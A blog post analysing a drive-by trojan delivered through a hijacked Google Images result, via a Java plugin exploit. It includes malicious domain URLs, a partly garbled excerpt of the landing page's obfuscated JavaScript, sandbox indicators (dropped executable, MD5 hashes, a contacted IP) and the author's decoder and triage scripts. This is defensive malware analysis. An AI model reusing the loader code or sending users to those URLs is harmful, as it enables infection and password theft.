Google Images redirects to a new virus

A while ago I wrote an article about how a simple Google Images search was hijacked and led to a fake antivirus. That fake antivirus, "Windows Security", was an obfuscated JavaScript running in the browser and imitating Windows Explorer; it could do no harm beyond irritating users with repeated fake alert pop-ups. Of course, a "solution" to these false infections is offered: download and install another rogue program, AntiSpyWareSetup.exe.

You don't need much online experience to realize that installing the rogue software will infect your system for real and possibly compromise it, because once a trojan is inside the operating system it opens the gates for a myriad of other malware. However, several steps are needed before an unsuspecting user's computer becomes infected: the user must click the "Remove all infections" button (which is really a download link), download the rogue program described above, and install it. Unless the user is a child, I think nobody falls into this trap.

But yesterday somebody told me about another Google Images search that can lead to an infection without user intervention: simply clicking an image on the first page of Google Images results redirects the user to a malware domain, where a malicious Java applet is loaded by the browser's Java plugin and drops and runs an executable, a classic drive-by attack. This new trojan looks like a much more serious problem: it appears to be after the browser's saved passwords, and as soon as it is installed it connects to a remote IP address.

Let's start at the beginning. Yesterday, anyone who searched Google Images for Presley Walker pictures and clicked the first image in the results was redirected and automatically infected unless proper defensive software was in place.

The full URL taken from the browser address bar was:

http://www.google.fi/imgres?imgurl=http://media1.englishbaby.com/dynamic/my_photo/image/0000/0000/0582/582849_1207016226_560070.jpg&imgrefurl=http://meble-zach.laohost.net/presley-walker%26page%3D2&usg=__i5h8m160Hg_MBAENC0bFErNk8Ic=&h=400&w=324&sz=27&hl=fi&start=1&zoom=1&tbnid=xVO3e4u_qm5S-M:&tbnh=124&tbnw=100&ei=pSyqTZScOpKq8APi0YC5Ag&prev=/search%3Fq%3DPresley%2BWalker%26hl%3Dfi%26client%3Daff-cs-worldbrowser%26hs%3DcYv%26sa%3DX%26biw%3D1924%26bih%3D838%26tbm%3Disch%26prmd%3Divns&itbs=1

The imgrefurl parameter names the page Google credits with the image, meble-zach.laohost.net/presley-walker&page=2 (the photo itself is hotlinked from englishbaby.com). Google's image viewer loads that page, and from there the visitor is redirected to:

http://likestop.info/TF19

which is the malicious domain hosting the malware.

Fortunately, as of today this Google Images search is no longer hijacked and the redirect no longer fires, because Google has fixed things, but the malware is still present at the URL above.

An excerpt of the source of the page at http://likestop.info/TF19 is below. It is in fact a blank page, sometimes showing a little square, with JavaScript running in the background. Note the decoy metadata (a careers site, Gmail, a mechanical keyboard) copied from legitimate pages to look harmless, followed by the obfuscated script; the script is reproduced as it appeared, and some characters were lost in copying. It looks like truly black hat stuff:

<html lang="en" dir="ltr">
<head>

<meta name="description" content="Careers: Take your career to new heights with little help from the experts. From getting ahead, to honing effective work habits, to getting along better with your boss, our career." />

<meta name="category" scheme="DMINSTR2" content="Careers &amp; Work" />
<meta name="pagetype" scheme="DMINSTR2" content="category" />
<meta name="wa_lr" scheme="DMINSTR2" content="en-US" />
<meta name="studioid" scheme="DMINSTR2" content="" />
<meta name="contentid" scheme="DMINSTR2" content="" />
<meta name="subcategory" scheme="DMINSTR2" content="" />

<meta name="subsubcat" scheme="DMINSTR2" content="" />
<meta name="siteid" scheme="DMINSTR2" content="EHWC" />
<meta name="exp_name" scheme="DMINSTR2" content="Rebuild" />
<meta name="exp_page" scheme="DMINSTR2" content="Rebuild-TestGroup" />
<meta name="wa_un" scheme="DMINSTR2" content="" />

<meta name="wa_isreg" scheme="DMINSTR2" content="" />
<meta name="wa_lgdin" scheme="DMINSTR2" content="" />
<meta name="wa_clvl" scheme="DMINSTR2" content="1" />
<meta name="wa_lgsrc" scheme="DMINSTR2" content="1" />

<meta name="description" content="7+ GB of storage, less spam, and mobile access. Gmail is email that's intuitive, efficient, and useful. And maybe even fun.">
ico" href="//mail.google.com/favicon.ico">
<style type=text/css>
body,td,div,p,a,font,span {font-family: arial,sans-serif}
body {margin:1em 0;}
h1 { font-size:1.3em; font-weight:normal; margin:0 0 0.4em; }
.intro { margin:0 1em 0.5em 0 }
.c {width: 4; height: 0}
.footer { text-align:center; margin:1em 0 }

.tl {padding: 0; width: 4; text-align: left; vertical-align: top}
.tr {padding: 0; width: 4; text-align: right; vertical-align: top}
.bl {padding: 0; width: 4; text-align: left; vertical-align: bottom}
.br {padding: 0; width: 4; text-align: right; vertical-align: bottom}

.caption {color:#000000; white-space:nowrap; background:#E8EEFA; text-align:center}
.form-noindent {background-color: #ffffff; border: #C3D9FF 1px solid}
.feature-image {padding: 15px 0 0 0; width:48px; vertical-align: top; text-align: right; }
.feature-description {padding: 20px 0 0 10px; vertical-align: top; text-align: left; }
.signup_btn {cursor: pointer; margin: 10px 0 -20px 0; text-align: center; }
.signup_btn_link {color: #000; text-align: center; text-align: center; text-decoration: none; padding: 0 7px; font-weight: bold; font-size: 14px; white-space: nowrap; }

</style>
<title>
Gmail: Email from Google
</title>
<style type="text/css">
body { font-size: smaller; }
</style>
<meta name="description" content="High-end mechanical keyboard providing outstanding tactile feedback. If you like the , is for you. Pure typing joy defined."/>
programer keyboard, geek keyboard, high quality keyboard, cherry, mx module, mx keys switch, mx blue key switch, mx brown key swith, mx black key switche, clicky keyboard, geek elite high quality pc keyboard, mechanical keyswitch, mechanical key switch, clicky keyboard, quality, USB, geek, tactile keyboard, geek gift, geek chic, nerd gift" />
<script>
try {
window.moniker = function(s){};

}
catch (e) {

}
function inte()
{
Call();
}

xm_ahvoei_=dmocbakawj;var sb$fslxcos="";var f$hquvn8f_='1';var cdjdq4ukd_='charAt';var ml0q3mxtom='length';var d2qsjrnhyk='abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPRST';var yqaabr5zvl='roxioa_is';var iwi_itam7k='getElementById';var vcswsdxstu=255;var bx$yj9$qne=256;var s$f6d9galv=4;var f1zf7s4y9o=5;var kxfj888i0w=20;var ja7wbjzpx2=65280;z8nd16f_jl=(function(e22$dib2dy,kvfu0pbrmi){return e22$dib2dy[kvfu0pbrmi];});var uz$alispdu=bx$yj9$qne;var x4rg4cofy0=100;var xn$zidhnq8=8;var fs3cxxd_lw=s$f6d9galv;var bgsciwrjjw=f1zf7s4y9o;var ak2alag120=0;var wxdoqs$0b9=1;var uq119ea145=4000;var dg$xhobxn1=kxfj888i0w;var fsk_dwkhvx=ja7wbjzpx2;function dmocbakawj(){var ll52d8ex_4=parseInt(k5gst7fbh$('roxioa_sk'));var damdm90hya=sb$fslxcos;for(var part=-x4rg4cofy0;partuq119ea145){isk=wxdoqs$0b9}}return ss;}function decodeHex(str){var result=[];var nextchar=sb$fslxcos;for(var i=ak2alag120;i>xn$zidhnq8;c2=code&vcswsdxstu;result['push'](String.fromCharCode(c1,c2));nextchar=sb$fslxcos}}return result['join'](sb$fslxcos);}function ipau2lhdtv(r5wbf2legb){return document[iwi_itam7k](r5wbf2legb);}function base_decode(num,alphabet){alphabet=d2qsjrnhyk;var len=num.length;var decoded=ak2alag120;var multi=wxdoqs$0b9;for(var i=len- wxdoqs$0b9;i>=ak2alag120;i--){decoded=decoded+multi*alphabet.indexOf(num[cdjdq4ukd_](i));multi=multi*alphabet[ml0q3mxtom]}return decoded;}function k5gst7fbh$(i9$dq66uq_){return i4oy29bj_j(ipau2lhdtv(i9$dq66uq_),wecrta73a4);}
try{
document.stupid();
}
catch(e){
}

</script>
</head>
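The decoder routines in the script above, de-aliased and reconstructed, as an added example for analysis (this is my own rewrite, not code from the page or from the malware author). The 42-symbol alphabet, the base_decode() loop and the two-bytes-per-code unpacking in decodeHex() are taken from the visible fragment; the encoder, the space-separated token layout and the sample DOM are my assumptions, used only to produce test input, and the functions i4oy29bj_j and wecrta73a4 that actually feed the decoder in the real page are not visible in the excerpt.

```javascript
// Added example, not code from the page or from the malware author: the
// decoder routines from the obfuscated script, de-aliased and reconstructed.
//
// The script hides its constants behind random names; resolving them gives:
//   d2qsjrnhyk = 'abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPRST'   (alphabet)
//   cdjdq4ukd_ = 'charAt'   ml0q3mxtom = 'length'   iwi_itam7k = 'getElementById'
//   vcswsdxstu = 255        xn$zidhnq8 = 8          ak2alag120 = 0   wxdoqs$0b9 = 1
//   ipau2lhdtv = id => document.getElementById(id)   (reads 'roxioa_sk' / 'roxioa_is')
//
// Assumptions (mine, for test input only): the encoder, the space-separated
// token layout and the sample DOM. The functions i4oy29bj_j and wecrta73a4
// that feed base_decode in the real page are not visible in the excerpt.

const ALPHABET = 'abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPRST'; // 42 symbols; no 'l', 'I', 'O', 'Q', 'U'..'Z'

// base_decode(): positional decode, most significant symbol first. As in the
// original, the alphabet argument is ignored and nothing is validated, so a
// symbol outside the alphabet silently contributes indexOf() == -1.
function baseDecode(num) {
  let decoded = 0;
  let multi = 1;
  for (let i = num.length - 1; i >= 0; i--) {
    decoded += multi * ALPHABET.indexOf(num.charAt(i));
    multi *= ALPHABET.length;
  }
  return decoded;
}

// decodeHex(): the surviving fragment unpacks each 16-bit value into two bytes,
// c1 = code >> 8 and c2 = code & 255, and appends String.fromCharCode(c1, c2).
function unpackWords(codes) {
  const out = [];
  for (const code of codes) {
    out.push(String.fromCharCode(code >> 8, code & 255));
  }
  return out.join('');
}

// Constructed inverse routines (not in the original), used to build test data.
function baseEncode(n) {
  if (n === 0) return ALPHABET[0];
  let s = '';
  while (n > 0) {
    s = ALPHABET[n % ALPHABET.length] + s;
    n = Math.floor(n / ALPHABET.length);
  }
  return s;
}

function packWords(text) {
  if (text.length % 2) text += '\0';            // pad to an even number of bytes
  const codes = [];
  for (let i = 0; i < text.length; i += 2) {
    codes.push((text.charCodeAt(i) << 8) | text.charCodeAt(i + 1));
  }
  return codes;
}

// The page reads its payload with document.getElementById('roxioa_sk'); for
// offline analysis the DOM is replaced by a plain object of id -> text.
function decodeHiddenPayload(dom, id) {
  const tokens = dom[id].split(' ');             // assumed token separator
  return unpackWords(tokens.map(baseDecode)).replace(/\0+$/, '');
}

// Constructed sample: a harmless string encoded the way the decoder expects.
const sampleDom = { roxioa_sk: packWords('hello').map(baseEncode).join(' ') };
console.log(decodeHiddenPayload(sampleDom, 'roxioa_sk'));
```

The point of the exercise is that once the string aliases are resolved the "encryption" is just base-42 with a custom alphabet; the real payload would be recovered by feeding the hidden element's text through the same two functions in a JavaScript engine with a stubbed document object, never in a real browser.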

I navigated to this malicious site using a sandboxed browser (Firefox running inside Sandboxie) and was able to track the changes the drive-by attack made to the system; they are presented below.

As a warning, keep in mind that even if you run the browser or a trojan inside a sandbox, it can still connect to the attackers' servers and send stolen data. If you are not careful you will end up with a computer that the sandbox kept clean of malware but with your online accounts stolen, which is not a happy ending.

[ Changes to filesystem ]
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\cookies.sqlite
* Creates file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\cookies.sqlite-journal
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\localstore.rdf
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\places.sqlite
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\pluginreg.dat
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\prefs.js
* Creates file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\sessionstore.js
* Creates file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0\17\7560f91-16655272
* Creates file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0\17\7560f91-16655272.idx
* Creates file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0\42\3bbc156a-3d1d62b5
* Creates file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0\42\3bbc156a-3d1d62b5.idx
* Modifies file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\deployment.properties
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Mozilla Firefox\updates\0\update.mar
* Creates file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\Cache\915F59E7d01
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\Cache\_CACHE_001_
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\Cache\_CACHE_002_
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\Cache\_CACHE_MAP_
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\XUL.mfl
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Temp\afurladvisor.log
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temp\v1wd1flc.exe

[ Changes to registry ]
* Deletes Registry key HKEY_LOCAL_MACHINE\software\Classes\clsid\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}
* Modifies value "Name=java.exe" in key HKEY_CURRENT_USER\software\Microsoft\Direct3D\MostRecentApplication
old value "Name=FLVPlayer.exe"
* Deletes Registry key HKEY_CURRENT_USER\software\classes\*\shell\sandbox

[ Network services ]
* Connects to "66.235.180.91" on port 80.

[ Process/window information ]
* Keylogger functionality.
* Creates a mutex "MSCTF.Shared.MUTEX.IPB".
* Creates an event named "MSCTF.SendReceive.Event.IPB.IC".
* Creates an event named "MSCTF.SendReceiveConection.Event.IPB.IC".
* Creates a mutex "jvmStart".
* Opens a service named "JavaQuickStarterService".
* Creates process "(null),"C:\Program Files\Java\jre6\bin\java.exe" -D__jvm_launched=109833283237 -Xbootclasspath/a:C:\PROGRA~1\Java\jre6\lib\deploy.jar;C:\PROGRA~1\Java\jre6\lib\javaws.jar;C:\PROGRA~1\Java\jre6\lib\plugin.jar -Djava.class.path=C:\PROGRA~1\Java\jre6\classes -Dsun.awt.warmup=true sun.plugin2.main.client.PluginMain write_pipe_name=jpi2_pid3260_pipe2,read_pipe_name=jpi2_pid3260_pipe1,(null)".
* Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500".
* Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500".
* Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500".
* Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500".
* Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500".
* Creates a mutex "CTF.TimListCache.FMPDefaultS-1-5-21-839522115-261903793-1417001333-500MUTEX.DefaultS-1-5-21-839522115-261903793-1417001333-500".
* Creates a mutex "DDrawWindowListMutex".
* Creates a mutex "__DDrawExclMode__".
* Creates a mutex "__DDrawCheckExclMode__".
* Creates an event named "jpi2_pid3260_evt3".
* Creates process "(null),C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\v1wd1flc.exe,(null)".

Just by involuntarily visiting this website, malware is dropped in the temporary %temp% directory. An interesting detail: on a second visit the file name and the MD5 hash of the malware were different, though the size was the same, 7.62 KB. On the first visit it was:

1dk8pu5p.exe   MD5:  C438EF1371451CC4CE47CE854595FABC

and at the second visit:

v1wd1flc.exe     MD5: FC2580B1FC0152785513ECC6B99C9461

These random names and differing MD5 hashes make the antivirus task harder, since a hash-based signature matches only the one sample it was written for. A scan at virustotal.com shows that only 5 of 41 antivirus engines detect this trojan, two of them merely as suspicious; it does not yet have a name, which is why I call it the TF19 virus. Another fact: this trojan tries to connect out over the Internet and transfer the Firefox profile folder, where the saved passwords, browsing history and other sensitive data are stored. Chances are good that more malware will be downloaded onto the computer as well, resulting in a keylogged machine at the attacker's disposal, a zombie computer.

The Sandboxie analysis (performed with the BSA add-on) also shows the infection chain running through the Java engine: the Java browser plugin is started (java.exe running sun.plugin2.main.client.PluginMain), two downloads are written to the Java deployment cache (each with its .idx index file), and then v1wd1flc.exe is created in %temp% and executed. The many writes to the Firefox profile (cookies.sqlite, places.sqlite, sessionstore.js and so on) are normal browser activity during a page visit and not by themselves evidence of theft; the Java cache entries, the dropped executable, its execution from %temp% and the connection to 66.235.180.91 are the real indicators.
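As an added example (not the post's own code and not part of BSA), here is a small triage script that pulls that chain out of a BSA-style text report. The sample report embedded in it is a subset of the lines listed above; the rules for what to flag and the output structure are my own assumptions:

```javascript
// Added example (not part of the original post): triage of a Sandboxie /
// Buster Sandbox Analyzer style text report. The sample lines are copied from
// the report in the post; the rules and output format are my own assumptions.

const sampleReport = `
[ Changes to filesystem ]
* Creates file C:\\Documents and Settings\\Administrator\\Application Data\\Sun\\Java\\Deployment\\cache\\6.0\\17\\7560f91-16655272
* Creates file C:\\Documents and Settings\\Administrator\\Application Data\\Sun\\Java\\Deployment\\cache\\6.0\\17\\7560f91-16655272.idx
* Creates file C:\\Documents and Settings\\Administrator\\Application Data\\Sun\\Java\\Deployment\\cache\\6.0\\42\\3bbc156a-3d1d62b5
* Modifies file C:\\Documents and Settings\\Administrator\\Application Data\\Mozilla\\Firefox\\Profiles\\rvpotxk5.default\\cookies.sqlite
* Modifies file C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\afurladvisor.log
* Creates file C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\v1wd1flc.exe

[ Network services ]
* Connects to "66.235.180.91" on port 80.

[ Process/window information ]
* Creates a mutex "jvmStart".
* Creates process "(null),"C:\\Program Files\\Java\\jre6\\bin\\java.exe" -D__jvm_launched=109833283237 -Xbootclasspath/a:C:\\PROGRA~1\\Java\\jre6\\lib\\deploy.jar;C:\\PROGRA~1\\Java\\jre6\\lib\\javaws.jar;C:\\PROGRA~1\\Java\\jre6\\lib\\plugin.jar -Djava.class.path=C:\\PROGRA~1\\Java\\jre6\\classes -Dsun.awt.warmup=true sun.plugin2.main.client.PluginMain write_pipe_name=jpi2_pid3260_pipe2,read_pipe_name=jpi2_pid3260_pipe1,(null)".
* Creates process "(null),C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\v1wd1flc.exe,(null)".
`;

// An executable under a Temp directory, in either the long or the 8.3
// "LOCALS~1\Temp" form. Only "Creates file" lines count, so the pre-existing
// afurladvisor.log that was merely modified is ignored.
const TEMP_EXE_FILE = /\\temp\\[^\\",]+\.exe$/i;
const TEMP_EXE_IN_CMD = /[A-Z]:\\[^",]*\\temp\\[^\\",]+\.exe/i;
const JAVA_CACHE = /\\Sun\\Java\\Deployment\\cache\\/i;
const JAVA_PLUGIN_MAIN = 'sun.plugin2.main.client.PluginMain';

function triageReport(text) {
  const iocs = {
    droppedExecutables: [],  // new .exe files written under a Temp directory
    tempProcesses: [],       // processes started from a Temp path
    javaCacheEntries: [],    // content the Java plugin downloaded and cached (.idx files skipped)
    javaPluginLaunched: false,
    network: [],             // "ip:port" the sandboxed processes connected to
  };
  for (const raw of text.split('\n')) {
    const line = raw.trim();
    if (!line.startsWith('* ')) continue;   // skip section headers and blank lines
    const item = line.slice(2);
    let m;
    if ((m = item.match(/^Creates file (.+)$/))) {
      const path = m[1];
      if (TEMP_EXE_FILE.test(path)) iocs.droppedExecutables.push(path);
      if (JAVA_CACHE.test(path) && !path.endsWith('.idx')) iocs.javaCacheEntries.push(path);
    } else if ((m = item.match(/^Connects to "([^"]+)" on port (\d+)\./))) {
      iocs.network.push(m[1] + ':' + m[2]);
    } else if ((m = item.match(/^Creates process "(.+)"\.?$/))) {
      const cmd = m[1];
      if (/java\.exe/i.test(cmd) && cmd.includes(JAVA_PLUGIN_MAIN)) iocs.javaPluginLaunched = true;
      const t = cmd.match(TEMP_EXE_IN_CMD);
      if (t) iocs.tempProcesses.push(t[0]);
    }
  }
  return iocs;
}

// Verdict: the chain the post describes is plugin launch -> payload cached ->
// executable dropped in Temp -> executed from Temp -> outbound connection.
function summarize(iocs) {
  const complete = iocs.javaPluginLaunched && iocs.javaCacheEntries.length > 0 &&
    iocs.droppedExecutables.length > 0 && iocs.tempProcesses.length > 0 && iocs.network.length > 0;
  if (!complete) return 'incomplete chain: ' + JSON.stringify(iocs);
  return 'drive-by chain via Java plugin: dropped ' + iocs.droppedExecutables.join(', ') +
    '; executed ' + iocs.tempProcesses.join(', ') + '; C2 ' + iocs.network.join(', ');
}

console.log(summarize(triageReport(sampleReport)));
```

The value of looking at the report this way is that it keys on behaviour (a plugin-spawned process writing and running an executable from %temp%, then talking to a fixed address) rather than on the file name or MD5, both of which changed between the two visits described above.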

Out of curiosity, I performed a Google search for "TF19 trojan virus", and it came up with a virustotal.com report for another TF19 domain:

http://bluewiki.info/TF19

The virustotal.com verdict for this site was "100% clean site", despite user comments on the scan result page warning about an infection after visiting that address.

The same "100% clean site" verdict is given for the site analyzed here, http://likestop.info/TF19. Very, very bad for users.

Another result of a Google search for "TF19 virus" is on the Dr.Web Anti-virus site, where a connection is made with a trojan that Avira names TR/Spy.Bancos.TF.19, used by attackers to steal online banking accounts, email accounts and other sensitive data as well.

It is a good thing that Google reacts very quickly to these kinds of threats, but the way this malware finds its way onto our computers without user interaction, just by clicking an image, reminds us how important it is to run a reputable Internet security suite that is always up to date. Even so, there is no guarantee that we will stay clean, but that is all that depends on us: keeping the antivirus and the operating system updated with the latest security patches and, since this chain runs through the Java browser plugin, keeping Java patched or disabling the plugin in the browser if it is not needed.

Hmmm, seeing infection methods like this one, I hate to say it, but we also need a bit of luck to avoid an infection.

Keep safe!
